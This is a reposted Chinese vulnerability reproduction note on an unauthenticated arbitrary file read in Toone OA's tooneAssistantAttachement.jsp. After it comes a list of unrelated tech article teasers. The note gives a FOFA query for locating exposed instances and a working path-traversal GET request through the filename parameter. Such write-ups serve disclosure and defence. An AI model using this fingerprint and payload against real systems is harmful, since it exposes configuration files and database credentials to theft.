同望OA tooneAssistantAttachement.jsp 任意文件读取漏洞复现
0x01 产品简介
同望OA,即同望科技打造的智企云协同管理系统,是一款高效的企业协同移动办公系统。秉承“互联网++企业管理”理念,定位于以移动互联办公为基础的企业协同管理软件平台。它旨在通过内置常用标准模块与专项管理模块应用,安全快速地打通管理与业务通道,实现管理柔性和刚性的完美结合,助力企业实现协同价值最大化。
0x02 漏洞概述
同望OA tooneAssistantAttachement.jsp 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:
body="loginAction.struts?actionType=blockLogin"
0x04 漏洞复现
PoC
GET /jsp/oa/app/webservice/tooneAssistant/tooneAssistantAttachement.jsp?filename=./../../../../
原文地址:https://blog.csdn.net/qq_41904294/article/details/142824489
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!
-
从零开始学习PX4源码7(hello world)
本节主要记录如何在PX4中创建一个应用程序hello world 的过程,具体可以参考官网hello sky的过程hello sky。
阅读更多2024-10-12
-
C++11 简单手撕多线程编程
std::thread 创建线程阻塞主线程线程分离。
阅读更多2024-10-12
-
ARM综合编程--LED--ADC--UART--中断--PWM综合示例按键和旋钮控制音乐
包括歌曲和音符数组。定义控制LED灯和按键的GPIO地址(这里你需要提供准确的硬件位置信息)。定义用于ADC旋钮调节音量的变量。// 全局变量定义// 两只老虎// 生日快乐// abcdefg//
阅读更多2024-10-12
-
java医院后台管理系统设计与实现源码(springboot+vue+mysql)
系统架构:项目简介首页、个人中心、用户管理、零食分类管理、零食信息管理、订单评价管理、系统管理、订单管理。首页、零食信息、零食资讯、个人中心、后台管理、购物车、在线客服等功能。💕💕作者:落落💕💕个人简
阅读更多2024-10-12
-
MS8510国产PIN对PIN可替代(联阳)IT8987。有技术支持
MS8510 内部集成了 KBC、PMC、PS/2、PWM、ADC、SMBUS、KBS、CIR、SPI、UART、Timer、PECI 等模块,内建 RC、POR、LDO 等模拟电路,外围电路简单,支
阅读更多2024-10-12
-
Nginx请求头丢失,引发出来的问题
但是目标服务后端打印出来的参数,是没有api_key_id和api_key_value这2个参数的。api_key_id和api_key_value这2个参数传递过程中丢失或则根本没传递。,这个参数默
阅读更多2024-10-12
-
JavaScript进阶笔记--解构赋值
本文介绍了JavaScript进阶中的解构赋值,包括数组解构,对象解构,forEach和filter方法,以及相关案例
阅读更多2024-10-12
-
Spring AI 介绍与入门使用 -- 一个Java版Langchain
Spring AI 是由Pivotal的Spring团队专门维护的AI调用框架,它通过标准化不同AI服务提供商的接口实现,使开发者能够以统一的方式编写代码,并仅通过修改配置即可轻松切换不同的AI实现。
阅读更多2024-10-12
-
2024网络安全学习路线 非常详细 推荐学习
渗透测试学习、零基础学安全、路线首先咱们聊聊,学习网络安全方向通常会有哪些问题学基础花费很长时间,光语言都有几门,有些人会倒在学习 linux 系统及命令的路上,更多的人会倒在学习语言上;对于网络安全
阅读更多2024-10-12
-
Go语言学习第二章
数值型1:整数型(int,int8,int16,int32,uint,uint8,uint16,uint32,uint64,byte)第三种,如果没有写变量的类型,那么根据"="后
阅读更多2024-10-12